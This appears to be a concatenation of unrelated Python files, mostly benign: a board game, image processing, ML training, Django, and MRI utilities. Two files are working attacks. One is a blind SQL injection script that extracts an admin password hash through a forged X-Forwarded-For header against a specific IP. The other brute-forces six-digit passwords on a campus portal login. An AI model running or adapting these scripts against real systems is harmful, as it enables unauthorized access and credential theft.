:type num_piece: int
"""
self._captured_pieces += num_piece
def get_reserve_pieces(self):
"""get method for player's _reserve_pieces
:return: player's _reserve_pieces
:rtype: int
"""
return self._reserve_pieces
def set_reserve_pieces(self, num_piece):
"""set method for player's _reserve_pieces, +1 to add a piece, -1 to remove a piece
:param num_piece: piece(s) to add to or remove from a player's reserve pieces
:type num_piece: int
"""
self._reserve_pieces += num_piece
class FocusGame:
"""represents the game"""
def __init__(self, p1_tup, p2_tup):
"""initializes a game object
:param p1_tup: strings of player1_name and player1_color
:type p1_tup: tuple
:param p2_tup: strings of player2_name and player2_color
:type p2_tup: tuple
"""
self._player1 = Player(p1_tup[0], p1_tup[1])
self._player2 = Player(p2_tup[0], p2_tup[1])
self._board = Board(self._player1.get_player_color(), self._player2.get_player_color())
self._turn = self._player1
def validate_move(self, player_name, start_loc, end_loc, num_pieces):
"""checks the validity of any moves
:param player_name: name of player who's trying to move
:type player_name: str
:param start_loc: coord to move pieces from
:type start_loc: tuple
:param end_loc: coord to move pieces to
:type end_loc: tuple
:param num_pieces: number of pieces to move
:type num_pieces: int
:return: notification codes for whether the move is valid or not
:rtype: str
"""
if player_name != self._turn.get_player_name(): # check if it's player's turn
return "n_y_t" # Not_Your_Turn code
# check locations are possible spaces on board
if not -1 < start_loc[0] < 6 or not -1 < start_loc[1] < 6:
return "i_s_l" # Illegal_Start_Location code
if not -1 < end_loc[0] < 6 or not -1 < end_loc[1] < 6:
return "i_e_l" # Illegal_End_Location code
# check if end_loc is num_pieces away from start_loc, and only vertical or horizontal move
row_move = abs(start_loc[0] - end_loc[0])
column_move = abs(start_loc[1] - end_loc[1])
if not ((row_move == 0 and column_move == num_pieces) or (row_move == num_pieces and column_move == 0)):
return "i_l" # Illegal_Location code
# check stack for: if piece on top belongs to turn player, & player not trying to move more pieces than in stack
for loc in self._board.get_full_board_list(): # loop through locations on board
if loc[0] == start_loc: # find start coord
if loc[-1] != self._turn.get_player_color(): # check if piece on top belongs to turn player
return "i_l"
elif num_pieces > (len(loc) - 1): # check not trying to move more pieces than in stack
return "i_n_o_p" # Invalid_Number_Of_Pieces code
def move_piece(self, player_name, start_loc, end_loc, num_pieces):
"""move method, for single and multiple moves
:param player_name: name of player who's trying to move
:type player_name: str
:param start_loc: coord to move pieces from
:type start_loc: tuple
:param end_loc: coord to move pieces to
:type end_loc: tuple
:param num_pieces: number of pieces to move
:type num_pieces: int
:return: notification messages, or False for whether the move was completed successfully or not
:rtype: str or bool
"""
# check if move is valid
val = self.validate_move(player_name, start_loc, end_loc, num_pieces)
if val == "n_y_t":
return False
elif val == "i_l" or val == "i_s_l" or val == "i_e_l":
return False
elif val == "i_n_o_p":
return False
# move
picked_up = [] # hold pieces being moved
for loc in self._board.get_full_board_list(): # loop through locations on board
if loc[0] == start_loc: # find start coord
for i in range(num_pieces): # for each piece being moved
# picked_up += loc[len(loc) - 1] # add moved piece (from top of stack) to picked_up
picked_up.append(loc[len(loc) - 1]) # add moved piece (from top of stack) to picked_up
del loc[len(loc) - 1] # delete moved piece (from top of stack)
for loc in self._board.get_full_board_list(): # loop through locations on board
if loc[0] == end_loc: # find end coord
for i in range(len(picked_up), 0, -1): # for each piece in pieces, backwards from the end
loc.append(picked_up[i - 1]) # add piece (one by one) to coord
# check if stack is > 5
player_obj = self.get_player_object(player_name)
self.check_height(player_obj, end_loc)
# check win condition
if player_obj.get_captured_pieces() >= 6:
return f"{player_obj.get_player_name()} Wins"
# alternate turn
self.set_turn(player_name)
return "successfully moved"
def reserved_move(self, player_name, location):
"""move method for moving a piece from player's own reserve
:param player_name: name of player who's trying to move
:type player_name: str
:param location: coord to move piece to
:type location: tuple
:return: notification messages, or False for whether the move was completed successfully or not
:rtype: str or bool
"""
# check if move is valid
val = self.validate_move(player_name, (0, 0), location, 1)
if val == "n_y_t":
return False
elif val == "i_e_l":
return False
# move
player_obj = self.get_player_object(player_name) # check there's pieces in player's reserve
if player_obj.get_reserve_pieces() <= 0:
return False
else: # add piece to board location
for loc in self._board.get_full_board_list(): # loop through locations on board
if loc[0] == location:
loc.append(player_obj.get_player_color()) # add player's piece to location on board
player_obj.set_reserve_pieces(-1) # remove piece from player's reserve
# check if stack is > 5
self.check_height(player_obj, location)
# check win condition
if player_obj.get_captured_pieces() >= 6:
return f"{player_obj.get_player_name()} Wins"
# alternate turn
self.set_turn(player_name)
return "successfully moved"
def check_height(self, player_obj, location):
"""method to check if stack of pieces is > 5 pieces tall: if so: capture bottom pieces that belong to
the other player and/or reserve bottom pieces that belong to player in control of the stack
:param player_obj: name of player who's in control of stack
:type player_obj: Player
:param location: coord to check height of
:type location: tuple
"""
for loc in self._board.get_full_board_list():
if loc[0] == location: # find coord
while len(loc) > 6: # stack taller than 5
bottom_piece = loc[1]
if bottom_piece == player_obj.get_player_color():
player_obj.set_reserve_pieces(1)
else:
player_obj.set_captured_pieces(1)
del loc[1]
def show_pieces(self, loc):
"""shows pieces at a location on the board
:param loc: coord to show
:type loc: tuple
:return: a list with pieces at that location, index 0 = base level, or "invalid location"
:rtype: list or str
"""
# validation check that coord exists
val = self.validate_move(self._turn.get_player_name(), loc, (0, 0), 1)
if val == "i_s_l":
return "invalid location"
# return list of pieces
for space in self._board.get_full_board_list():
if space[0] == loc: # find loc
return space[1:]
def show_reserve(self, player_name):
"""show a count of pieces in that player's reserve
:param player_name: name of player
:type player_name: str
:return: player's _reserve_pieces
:rtype: int
"""
return self.get_player_object(player_name).get_reserve_pieces()
def show_captured(self, player_name):
"""show count of pieces in that player's captured
:param player_name: name of player
:type player_name: str
:return: player's _captured_pieces
:rtype: int
"""
return self.get_player_object(player_name).get_captured_pieces()
def get_player_object(self, player_name):
"""takes a player's name and returns the associated player object
:param player_name: name of player
:type player_name: str
:return: player object
:rtype: Player or bool
"""
if player_name == self._player1.get_player_name():
return self._player1
elif player_name == self._player2.get_player_name():
return self._player2
else:
return False # could also return "not your turn"...?
def get_turn(self):
"""get method for player_turn
:return: player object whose turn it is
:rtype: Player
"""
return self._turn
def set_turn(self, current_player_name):
"""set method for player_turn
:param current_player_name: name of player
:type current_player_name: str
"""
if current_player_name == self._player1.get_player_name():
self._turn = self._player2
else:
self._turn = self._player1
def show_board(self):
"""shows board for current game"""
self._board.show_board()
def main():
"""for testing"""
# READ ME
# game = FocusGame(('PlayerA', 'R'), ('PlayerB', 'G'))
# print(game.move_piece('PlayerA', (0, 0), (0, 1), 1)) # Returns message "successfully moved"
# print(game.show_pieces((0, 1))) # Returns ['R','R']
# print(game.show_captured('PlayerA')) # Returns 0
# print(game.reserved_move('PlayerA', (0, 0))) # Returns False, not per update (message "No pieces in reserve")
# print(game.show_reserve('PlayerA')) # Returns 0
if __name__ == '__main__':
main()
|
class MyRange(object):
"""
同时作为可迭代对象和迭代器,只能进行一次迭代
"""
def __init__(self, start, end):
self.start = start
self.end = end
self.index = start
def __iter__(self):
# 这个方法返回一个迭代器
return self
def __next__(self):
if self.index < self.end:
tmp = self.index
self.index += 1
return tmp
else:
raise StopIteration
ret = MyRange(1, 10)
for i in ret:
print(i)
print("*" * 20)
# 因为在for循环中已经把index走到头了,所以下面并不会输出
ret_iter = ret.__iter__()
while True:
try:
x = ret_iter.__next__()
print(x)
except StopIteration:
break
|
import numpy as np
import cv2
import os
from time import sleep
from random import shuffle
from tqdm import tqdm
car_list = os.listdir('temp_data/car')
forest_list = os.listdir('temp_data/forest')
#print(file_list)
car = []
forest = []
car_one_hot = [1,0]
forest_one_hot = [0,1]
for file in tqdm(car_list):
if file.endswith(".jpeg"):
file_name = "temp_data/car/" + file
image = cv2.imread(file_name,cv2.IMREAD_GRAYSCALE)
image = np.array(cv2.resize(image,(90,90)))
new_image = image.reshape(-1,90,90,1)
canny = cv2.Canny(image,100,200)
new_canny = canny.reshape(-1,90,90,1)
concat = np.concatenate((new_image,new_canny),axis=3)
car.append([concat,car_one_hot])
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
for file in tqdm(forest_list):
if file.endswith(".jpeg"):
file_name = "temp_data/forest/" + file
image = cv2.imread(file_name,cv2.IMREAD_GRAYSCALE)
image = np.array(cv2.resize(image,(90,90)))
new_image = image.reshape(-1,90,90,1)
canny = cv2.Canny(image,100,200)
new_canny = canny.reshape(-1,90,90,1)
concat = np.concatenate((new_image,new_canny),axis=3)
forest.append([concat,forest_one_hot])
shuffle(forest)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
final_data = car + forest
shuffle(final_data)
# np.save('car_vs_forest.npy', final_data)
'''
Make the useable data from the image
'''
# start traing
from googlenet import googlenet
WIDTH = 90
HEIGHT = 90
LR = 1e-3
epoch = 10
model = googlenet(WIDTH,HEIGHT,LR)
for i in range(epoch):
# train_data = np.load('car_vs_forest.npy')
train_data = final_data
train = train_data
X = np.array([i[0] for i in tqdm(train)]).reshape(-1,90,90,2)
Y = [i[1] for i in train]
# test_X = np.array([i[0] for i in tqdm(test)]).reshape(-1,90,90,2)
# test_Y = [i[1] for i in test]
model.fit(X,Y, n_epoch=1, validation_set=0.1,shuffle=True,snapshot_step=500, show_metric=True, run_id="googlenet")
model.save("googlenet.model")
# data = []
# # label = []
# for i in final_data:
# # reshape_data = i[0].reshape(-1,90,90,1)
# # data.append([reshape_data])
# # label.append([i[1]])
# print(i[1])
# np.save('car_vs_forest_data.npy', data)
# np.save('car_vs_forest_label.npy', label) |
from django.contrib import admin
from .models import Autor
from .models import Ksiazka
from .models import WypozyczonaKsiazka
import adminactions.actions as actions
from django.contrib.admin import site
admin.site.register(Autor)
#admin.site.register(Ksiazka)
class KsiazkaAdmin(admin.ModelAdmin):
list_display = ('tytul', 'wydawnictwo', 'data_wydania', 'klucz_autora')
admin.site.register(Ksiazka, KsiazkaAdmin)
class WypozyczonaKsiazkaAdmin(admin.ModelAdmin):
list_filter = ('status', 'data_zwrotu', 'wypozyczajacy')
admin.site.register(WypozyczonaKsiazka, WypozyczonaKsiazkaAdmin)
actions.add_to_site(site)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 2 16:33:52 2019
@author: saib
"""
class Student:
total = 1
def __init__(self, n, a):
self.__full_name=n
self.age=a
self.rollno = self.__class__.total
self.__class__.total += 1
def inc_age(self, c):
self.age+=c
def __repr__(self):
return "Student"
def __gt__(self, other):
return self.age > other.age
def get_name(self):
return self.__full_name
class child_class(Student):
def __init__ (self, n,a,s):
Student.__init__(self,n,a)
self.section = s
|
#### Script for plotting machine produced data ####
#### IGA (machine 2) ####
import glob, os
from collections import OrderedDict
import simplejson as json
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
from matplotlib.pyplot import show, plot, ion
import pylab
import numpy as np
if __name__ == '__main__':
os.chdir(os.path.dirname(os.getcwd()))
for file in glob.glob("IGA_Files/Data_Files/JSON/*.json"):
json_file_path = file
sequence = file.split("/")[-1].split("_")[0]
with open('%s'%json_file_path) as json_data_file:
json_dict = json.load(json_data_file)
begin = 1
pressure_list = []
conc_list = []
while True:
try:
content_dict = json_dict["content"][begin - 1]
pressure_dict = content_dict.get('pressure')
conc_dict = content_dict.get('concentration')
pressure_val = pressure_dict.get('value')
conc_val = conc_dict.get('value')
pressure_list.append(pressure_val)
conc_list.append(conc_val)
begin +=1
except:
break
plot_path = '%s/IGA_Files/IGA_plots/%s_IGAplot.png'%(os.getcwd(), sequence)
plt.plot(pressure_list, conc_list, 'ro')
plt.axis([0, 20, 0, 3.5])
plt.savefig('%s'%plot_path)
print "done"
|
from BeautifulSoup import BeautifulSoup
doc = open('base.html', 'r').readlines()
soup = BeautifulSoup(''.join(doc))
parse = open('parse.html', 'w')
parse.write(u'{0}'.format(soup.prettify()))
print(soup.prettify())
parse.close() |
from . import v1_core
def list_nodes():
return v1_core.list_node()
|
from processamento.Imagem import Imagem
from processamento import Filtros as ft
"""
Vamos ler algumas imagens, aplicar efeitos e salvá-las em arquivo
"""
def ler_imagem(caminho: str):
img = open(caminho, encoding='utf-8')
linhas = []
for linha in img:
if not linha.startswith('#') and linha != '\n':
linhas.append(linha)
# TODO: fazer com que na leitura, seja criado objeto tupla, que especifica o número de canais de um pixel.
# em seguida, o objeto pixel deve tomar a tupla como base para formar a matriz que sera iterada nos efeitos.
# tipo_img = TuplaCores(linhas[0])
tipo_img = linhas[0]
dim_matriz = linhas[1]
pixels = []
if tipo_img.__contains__('P1'):
valor_max = '1'
for linha in linhas[2:]:
linha = linha.replace(' ', '')
linha = linha.replace('\n', '')
for pixel in linha:
pixels.append(pixel)
else:
valor_max = int(linhas[2])
pixels = [int(valor) for valor in linhas[3:]]
return tipo_img, dim_matriz, valor_max, pixels
def realizar_operacoes_na_imagem(imagem: Imagem, efeito: ft.Filtro):
# nova_imagem = imagem
nova_imagem = Imagem(imagem.tipo, imagem.dimensao, imagem.maximo, imagem.pixels)
pixels_com_efeito = efeito.aplicar_efeito(imagem.pixels)
nova_imagem.pixels = pixels_com_efeito
nova_imagem.gerar_histograma(normalizar=True, salvar=True)
return nova_imagem
def aplicar_todos_efeitos(img_original: Imagem):
efeito_negativo = ft.Negativo()
efeito_limiarizacao = ft.Limiarizacao(valor_maximo=img_original.maximo, limiar=100)
efeito_fatiamento = ft.Fatiamento(100, 150)
img_negativa = realizar_operacoes_na_imagem(imagem=img_original, efeito=efeito_negativo)
img_limiarizada = realizar_operacoes_na_imagem(imagem=img_original, efeito=efeito_limiarizacao)
img_fatiada = realizar_operacoes_na_imagem(imagem=img_original, efeito=efeito_fatiamento)
img_negativa.salvar('img/saida_negativo.ppm')
img_limiarizada.salvar('img/saida_limiarizacao.ppm')
img_fatiada.salvar('img/saida_fatiamento.ppm')
# print('Histograma da imagem negativada:\n{}'.format(img_negativa.histograma))
# print('Histograma da imagem limiarizada:\n{}'.format(img_limiarizada.histograma))
# print('Histograma da imagem fatiada:\n{}'.format(img_fatiada.histograma))
# img_negativa.equalizar()
# img_limiarizada.equalizar()
# img_fatiada.equalizar()
def main():
path_entrada = 'img/ankh_negativo.pbm'
tipo, dim, maxi, pixels = ler_imagem(path_entrada)
img_original = Imagem(tipo=str(tipo), dimensao=dim, maximo=maxi, pixels=pixels)
morfologia = ft.Morfologia()
suavizacao = ft.Suavizacao()
img_suavizada = suavizacao.filtro_da_mediana(img_original)
nome_saida = 'out/ankh_negativo_suavizado.pbm'
img_suavizada.salvar(nome_saida)
print('Imagem salva como: ', nome_saida)
img_erodida = morfologia.erosao(img_original)
nome_saida = 'out/ankh_negativo_erodido.pbm'
img_erodida.salvar(nome_saida)
print('Imagem salva como: ', nome_saida)
img_dilatado = morfologia.dilatacao(img_original)
nome_saida = 'out/ankh_negativo_dilatado.pbm'
img_dilatado.salvar(nome_saida)
print('Imagem salva como: ', nome_saida)
img_aberta = morfologia.abertura(img_original)
nome_saida = 'out/ankh_negativo_aberto.pbm'
img_aberta.salvar(nome_saida)
print('Imagem salva como: ', nome_saida)
img_fechada = morfologia.fechamento(img_original)
nome_saida = 'out/ankh_negativo_fechado.pbm'
img_fechada.salvar(nome_saida)
print('Imagem salva como: ', nome_saida)
if __name__ == '__main__':
main()
|
tomato_slices, cheese_slices=map(int,input().split())
Big_count=0
small_count=0
val=0
if(tomato_slices>cheese_slices):
val=tomato_slices
else:
val=cheese_slices
for i in range(1,val):
if(4*i<=tomato_slices and 1*i<=cheese_slices):
Big_count+=1
else:
break
for j in range(1,val):
if(2*j<=tomato_slices and 1*j<=cheese_slices):
small_count+=1
else:
break
print('Big Pizza:',Big_count)
print('Small Pizza:',small_count)
|
# -*- coding: utf-8 -*-
import nysol._nysolshell_core as n_core
from nysol.mcmd.nysollib.core import NysolMOD_CORE
from nysol.mcmd.nysollib import nysolutil as nutil
class Nysol_Mcombi(NysolMOD_CORE):
_kwd ,_inkwd,_outkwd = n_core.getparalist("mcombi",3)
def __init__(self,*args, **kw_args) :
super(Nysol_Mcombi,self).__init__("mcombi",nutil.args2dict(args,kw_args,Nysol_Mcombi._kwd))
def mcombi(self,*args, **kw_args):
return Nysol_Mcombi(nutil.args2dict(args,kw_args,Nysol_Mcombi._kwd)).addPre(self)
setattr(NysolMOD_CORE, "mcombi", mcombi)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
# Dictionnaire à tester
chars = '0123456789abcdef'
checking_str = 'Non mauvais password'
pwd_size = 32
# Hash MD5 en retour
result = ''
url = 'http://95.142.162.76:8082/index.php?p=admin'
data = {'username' : 'admin', 'password' : 'admin'}
print 'Merci de patienter pendant que le script récupère le hash du password...'
for index in range(pwd_size + 1):
for char in chars:
# Réécriture du header pour injection SQL
headers = { 'X-FORWARDED-FOR' : '127.0.0.1\' OR substr(password, %s, 1) = %s #' % (str(index), str(hex(ord(char)))) }
req = requests.post(url, data=data, headers=headers)
# Vérification du contenu retourné pour valider le caractère courant
if req.text.find(checking_str) == -1:
print 'Caractère en position %d trouvé.' % index
result = result + char
break
# resultat retrouver, flag ok
# retourner resultat
print 'Hash md5 : %s' % result
|
"""Builds vocabularies of tokens, lemmas, POS tags and labels"""
# Adapted from https://github.com/cs230-stanford/cs230-code-examples/blob/master/pytorch/nlp/build_vocab.py
# accessed on 03/09/2020
import argparse
import os
import json
from collections import Counter
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', default='data/balanced',
help="Directory containing the dataset")
PAD_WORD = '<pad>'
UNK_WORD = 'UNK'
def save_vocab_to_txt_file(vocab, txt_path):
"""Writes one token per line, 0-based line id corresponds to the id of the token.
Args:
vocab: (iterable object) yields token
txt_path: (stirng) path to vocab file
"""
with open(txt_path, 'w', encoding='utf-8') as f:
for token in vocab:
f.write(token + '\n')
def save_dict_to_json(d, json_path):
"""Saves dict to json file
Args:
d: (dict)
json_path: (string) path to json file
"""
with open(json_path, 'w', encoding='utf-8') as f:
d = {k: v for k, v in d.items()}
json.dump(d, f, indent=4)
def update_vocab(txt_path, vocab):
"""Update the different vocabularies from the dataset
Args:
txt_path: (string) path to file, one sentence per line
vocab: (dict or Counter) with update method
Returns:
dataset_size: (int) number of elements in the dataset
"""
with open(txt_path, 'r', encoding='utf-8') as f:
for i, line in enumerate(f):
vocab.update(line.strip().split(' '))
return i + 1
if __name__ == '__main__':
args = parser.parse_args()
# Build token vocab with train, val and test datasets
print("Building token vocabulary...")
tokens = Counter()
size_train_sentences = update_vocab(os.path.join(args.data_dir, 'train/tokens.txt'), tokens)
size_dev_sentences = update_vocab(os.path.join(args.data_dir, 'val/tokens.txt'), tokens)
size_test_sentences = update_vocab(os.path.join(args.data_dir, 'test/tokens.txt'), tokens)
print("Done.")
# Build lemma vocab with train, val and test datasets
print("Building lemma vocabulary...")
lemmas = Counter()
size_train_lemmas = update_vocab(os.path.join(args.data_dir, 'train/lemmas.txt'), lemmas)
size_dev_lemmas = update_vocab(os.path.join(args.data_dir, 'val/lemmas.txt'), lemmas)
size_test_lemmas = update_vocab(os.path.join(args.data_dir, 'test/lemmas.txt'), lemmas)
print("Done.")
# Build pos vocab with train, val and test datasets
print("Building pos vocabulary...")
pos = Counter()
size_train_pos = update_vocab(os.path.join(args.data_dir, 'train/pos.txt'), pos)
size_dev_pos = update_vocab(os.path.join(args.data_dir, 'val/pos.txt'), pos)
size_test_pos = update_vocab(os.path.join(args.data_dir, 'test/pos.txt'), pos)
print("Done.")
# Build tag vocab with train and test datasets
print("Building tag vocabulary...")
tags = Counter()
size_train_tags = update_vocab(os.path.join(args.data_dir, 'train/labels.txt'), tags)
size_dev_tags = update_vocab(os.path.join(args.data_dir, 'val/labels.txt'), tags)
size_test_tags = update_vocab(os.path.join(args.data_dir, 'test/labels.txt'), tags)
print("Done.")
# Assert same number of examples in datasets
assert size_train_sentences == size_train_lemmas == size_train_pos == size_train_tags
assert size_dev_sentences == size_dev_lemmas == size_dev_pos == size_dev_tags
assert size_test_sentences == size_test_lemmas == size_test_pos == size_test_tags
# Transorming to lists
tokens = [tok for tok, count in tokens.items()]
lemmas = [tok for tok, count in lemmas.items()]
pos = [tok for tok, count in pos.items()]
tags = [tok for tok, count in tags.items()]
# Add pad tokens
if PAD_WORD not in tokens: tokens.insert(0, PAD_WORD)
if PAD_WORD not in lemmas: lemmas.insert(0, PAD_WORD)
if PAD_WORD not in pos: pos.insert(0, PAD_WORD)
# add word for unknown words
tokens.insert(0, UNK_WORD)
lemmas.insert(0, UNK_WORD)
pos.insert(0, UNK_WORD)
# Save vocabularies to file
print("Saving vocabularies to file...")
save_vocab_to_txt_file(tokens, os.path.join(args.data_dir, 'tokens_vocab.txt'))
save_vocab_to_txt_file(lemmas, os.path.join(args.data_dir, 'lemmas_vocab.txt'))
save_vocab_to_txt_file(pos, os.path.join(args.data_dir, 'pos_vocab.txt'))
save_vocab_to_txt_file(tags, os.path.join(args.data_dir, 'labels_vocab.txt'))
print("- done.")
# Save datasets properties in json file
sizes = {
'train_size': size_train_sentences,
'dev_size': size_dev_sentences,
'test_size': size_test_sentences,
'vocab_size': len(tokens),
'number_of_lemmas': len(lemmas),
'number_of_pos': len(pos),
'number_of_labels': len(tags),
'pad_word': PAD_WORD,
'unk_word': UNK_WORD
}
save_dict_to_json(sizes, os.path.join(args.data_dir, 'dataset_params.json'))
# Logging sizes
to_print = "\n".join("- {}: {}".format(k, v) for k, v in sizes.items())
print("Characteristics of the dataset:\n{}".format(to_print)) |
# -*- coding: utf-8 -*-
"""MRI utilities.
"""
import numpy as np
import sigpy as sp
__all__ = ["get_cov", "whiten", "tseg_off_res_b_ct", "apply_tseg"]
def get_cov(noise):
"""Get covariance matrix from noise measurements.
Args:
noise (array): Noise measurements of shape [num_coils, ...]
Returns:
array: num_coils x num_coils covariance matrix.
"""
num_coils = noise.shape[0]
X = noise.reshape([num_coils, -1])
X -= np.mean(X, axis=-1, keepdims=True)
cov = np.matmul(X, X.T.conjugate())
return cov
def whiten(ksp, cov):
"""Whitens k-space measurements.
Args:
ksp (array): k-space measurements of shape [num_coils, ...]
cov (array): num_coils x num_coils covariance matrix.
Returns:
array: whitened k-space array.
"""
num_coils = ksp.shape[0]
x = ksp.reshape([num_coils, -1])
L = np.linalg.cholesky(cov)
x_w = np.linalg.solve(L, x)
ksp_w = x_w.reshape(ksp.shape)
return ksp_w
def tseg_off_res_b_ct(b0, bins, lseg, dt, T):
"""Creates B and Ct matrices needed for time-segmented off-resonance
compensation.
Args:
b0 (array): inhomogeneity matrix.
bins (int): number of histogram bins to use.
lseg (int): number of time segments.
dt (float): hardware dwell time (ms).
T (float): length of pulse (ms).
Returns:
2-element tuple containing
- **B** (*array*): temporal interpolator.
- **Ct** (*array*): off-resonance phase at each time segment center.
"""
# create time vector
t = np.linspace(0, T, int(T / dt))
hist_wt, bin_edges = np.histogram(
np.imag(2j * np.pi * np.concatenate(b0)), bins
)
# Build B and Ct
bin_centers = bin_edges[1:] - bin_edges[1] / 2
zk = 0 + 1j * bin_centers
tl = np.linspace(0, lseg, lseg) / lseg * T / 1000 # time seg centers
# calculate off-resonance phase @ each time seg, for hist bins
ch = np.exp(-np.expand_dims(tl, axis=1) @ np.expand_dims(zk, axis=0))
w = np.diag(np.sqrt(hist_wt))
p = np.linalg.pinv(w @ np.transpose(ch)) @ w
b = p @ np.exp(
-np.expand_dims(zk, axis=1) @ np.expand_dims(t, axis=0) / 1000
)
b = np.transpose(b)
b0_v = np.expand_dims(2j * np.pi * np.concatenate(b0), axis=0)
ct = np.transpose(np.exp(-np.expand_dims(tl, axis=1) @ b0_v))
return b, ct
def apply_tseg(array_in, coord, b, ct, fwd=True):
"""Apply the temporal interpolator and phase shift maps calculated
Args:
array_in (array): array to apply correction to.
coord (array): coordinates for noncartesian trajectories. [Nt 2].
b (array): temporal interpolator.
ct (array): off-resonance phase at each time segment center.
fwd (Boolean): indicates forward direction (img -> kspace) or
backward (kspace->img)
Returns:
out (array): array with correction applied.
"""
# get number of time segments from B input.
lseg = b.shape[1]
dim = array_in.shape[0]
out = 0
if fwd:
for ii in range(lseg):
ctd = np.reshape(ct[:, ii] * array_in.flatten(), (dim, dim))
out = out + b[:, ii] * sp.fourier.nufft(ctd, coord * 20)
else:
for ii in range(lseg):
ctd = np.reshape(
np.conj(ct[:, ii]) * array_in.flatten(), (dim, dim)
)
out = out + sp.fourier.nufft(ctd, coord * 20) * np.conj(b[:, ii])
return np.expand_dims(out, 1)
|
#!/usr/bin/env python
# encoding: utf-8
import time
import requests
import re
from multiprocessing import Pool
def get(pwd):
url='http://222.179.99.144:8080/eportal/webGateModeV2.do?method=login¶m=true&wlanuserip=10.117.30.232&wlanacname=Ruijie_Ac_80eeb9&ssid=CQWU&nasip=192.168.255.5&mac=f6995122027c&t=wireless-v2-plain&url=http://web.archive.org/web/20151116122728/http://segmentfault.com/a/1190000000356021&username=2013&pwd='+str(pwd)
# print(url)
webdata=requests.get(url)
# print(webdata.text)
pattern=re.compile('<div id="errorInfo_center" val="(.*?)"></div>')
judge=str(pattern.findall(webdata.text))[2:-2]
if judge!='认证失败!,密码不匹配,请输入正确的密码!': #
print("密码:%s success! >>>>>%s"%(pwd,judge))
return True
else:
print(pwd+' was test!')
def loop():
for i in range(258146,1000000):
a="%06d"%i
yield a
def timed(func):
def wrapper():
start = time.clock()
func()
end = time.clock()
print('%.1f seconds'%(end - start))
return wrapper
@timed
def main():
gen = loop()
pool = Pool()
pool.map(get, gen)
# pool.close()
# pool.join()
@timed
def slown():
for i in range(1000):
a = "%06d" % i
get(a)
if __name__ == '__main__':
main()
# slown()
|
#!/usr/bin/python
try:
import SocketServer as socketserver
except ImportError:
import socketserver
class MyTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
self.data = self.request.recv(1024).strip()
print("{} wrote:".format(self.client_address[0]))
decoded = self.data.decode('utf-8')
print(decoded)
self.request.sendall(decoded.upper().encode('utf-8'))
if __name__ == '__main__':
HOST, PORT = '0.0.0.0', 4001
server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
server.serve_forever() |
# Generated by Django 3.0.6 on 2020-06-12 09:47
import colorfield.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Home', '0015_auto_20200611_1907'),
]
operations = [
migrations.AddField(
model_name='item',
name='extra_large',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='item',
name='extra_samll',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='item',
name='item_color1',
field=colorfield.fields.ColorField(default='#FF0000', max_length=18),
),
migrations.AddField(
model_name='item',
name='item_color2',
field=colorfield.fields.ColorField(default='#FF0000', max_length=18),
),
migrations.AddField(
model_name='item',
name='item_color3',
field=colorfield.fields.ColorField(default='#FF0000', max_length=18),
),
migrations.AddField(
model_name='item',
name='large',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='item',
name='small',
field=models.BooleanField(default=True),
),
]
|
import time
import torch
import numbers
from collections import Counter
import torch
import torch.functional as F
from torch.nn.utils.rnn import pad_sequence
from torchtext.datasets import text_classification
from torchtext.vocab import Vocab
import metrics
import numpy as np
_t0 = time.time()
def log(*args, **kwargs):
global _t0
print("{:8.2f}: ".format((time.time() - _t0) / 60), end="")
print(*args, **kwargs)
def generate_batch(batch):
'''Reformat data for fn_collate'''
# batch is a list of tuple (pid, label, text)
# label dims [batch_size]
y = [entry[1] for entry in batch]
label = torch.stack(y).float()
# entry is variable length, padded with 0
# text dims [batch_size, batch_length]
text = [entry[2] for entry in batch]
# used by pytorch to know the actual length of each sequence
# offsets dims [batch_size]
offsets = torch.tensor([len(entry) for entry in text], dtype=torch.int64)
text = pad_sequence(text, batch_first=True)
ids = [entry[0] for entry in batch]
return ids, text, offsets, label
def count_parameters(model):
'''Count total number of parameters to update in model'''
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def epoch_time(start_time, end_time):
'''Calculate total amount fo time spent training'''
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
def build_lstm_dataset(
datapath,
min_freq=10,
uid_colname="discharge_id",
target_colname="unplanned_readmission",
x_inputs=[str(x) for x in range(999, -1, -1)],
target_value="True",
vocab=None,
pos_labs_vocab=False,
nrows=1e9,
rev=True,
):
'''
Reads in dataset line by line, creates vocabulary and subsets dataset to list of arrays to be used later.
Note: Key difference to transformer build_dataset (has remove_death, build_vocab functions together):
1. Line by line reading, as the 1000 format CSV file takes a long time to read via pandas
2. Incorporates remove death immediately
3. Builds vocabulary here
Arguments:
---------
datapath (str) : path to 1000 CSV file
min_freq (int) : minimum frequency for vocabulary
uid_colname (str) : name of unique identifier in each row (patient_id, discharge_dt)
returned in list of arrays
target_colname (str) : column name of target label
x_inputs (list) : list of columns to be used as inputs
target_value (str) : value to take as positive label
vocab (Vocab) : default None creates vocabulary. Will use provided vocab if given.
pos_labs_vocab (bool) : use only vocabulary from positive label cases
nrows (int) : number of rows to process
Returns:
--------
a list of data and attributes in the following order:
patientid_dischargeid key,
sequence of events,
targets, and
mask (identifying padded regions)
'''
def valid_token(t):
if len(t) == 0 or t == "<pad>":
return False
return True
log("Build token list")
token_list = []
with open(datapath, "r") as f:
# determine column mapping
header = f.readline()
header = [h.replace(" ", "").replace("\n", "") for h in header.split(",")]
target_index = header.index(target_colname)
uid_index = header.index(uid_colname)
x_idxes = []
for colname in x_inputs:
x_idxes.append(header.index(colname))
# start processing
line = f.readline()
invalid_uid = 0
deaths = 0
while line:
if 'death' in line:
deaths += 1
pass
tokens = line.split(",")
if len(tokens[uid_index]) == 0:
invalid_uid += 1 # some UIDS are missing
pass
else:
uid = tokens[uid_index]
label = 1 if tokens[target_index].startswith(target_value) else 0
tokens = [tokens[idx] for idx in x_idxes]
tokens = [t.strip().replace('\n', '') for t in tokens if valid_token(t)]
if rev:
tokens = tokens[::-1]
